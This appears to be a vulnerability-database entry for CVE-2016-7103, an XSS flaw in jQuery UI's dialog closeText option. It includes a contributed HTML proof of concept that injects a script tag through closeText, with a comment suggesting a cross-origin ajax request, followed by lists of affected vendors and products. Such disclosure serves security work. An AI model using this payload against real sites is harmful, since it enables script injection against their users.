Low
CVE-2016-7103
CVE-2016-7103
Description
Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.
Add Assessment
Technical Analysis
PoC:
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XSS in closeText option of component ui dialog</title> <script src="https://code.jquery.com/jquery-2.1.4.js"></script> <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script> <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css"> <script>
$(document).ready(function ()
{ $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' }); // This is the attack point where you can inject code
// if the CORS/CSP policy is not configured or setup wrong, try an jQuery vuln using $.ajax(’https://www.msn.com/robots.txt’);
// if it says onready:1 expand it you should see msn.com’s robots file
// this is a doublewammy of vulnerability in the target
} ); </script>
</head>
<body>
<div id="dialog" title="Dialog Title">Content here!</div>
</body>
</html>
Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention social engineer or phishing to make this persistant or of real use
Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm
Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137
dj substance
https://tranceattic.com
CVSS V3 Severity and Metrics
General Information
Vendors
- debian,
- fedoraproject,
- jqueryui,
- juniper,
- netapp,
- oracle,
- redhat
Products
- application express,
- business intelligence 12.2.1.3.0,
- business intelligence 12.2.1.4.0,
- debian linux 9.0,
- fedora 30,
- fedora 35,
- fedora 36,
- hospitality cruise fleet management 9.0.11,
- jquery ui,
- junos 21.2,
- openstack 7.0,
- openstack 8,
- openstack 9,
- oss support tools,
- oss support tools 2.12.42,
- primavera unifier,
- siebel ui framework,
- snapcenter -,
- weblogic server 10.3.6.0.0,
- weblogic server 12.1.3.0.0,
- weblogic server 12.2.1.3.0
References
Advisory
Miscellaneous
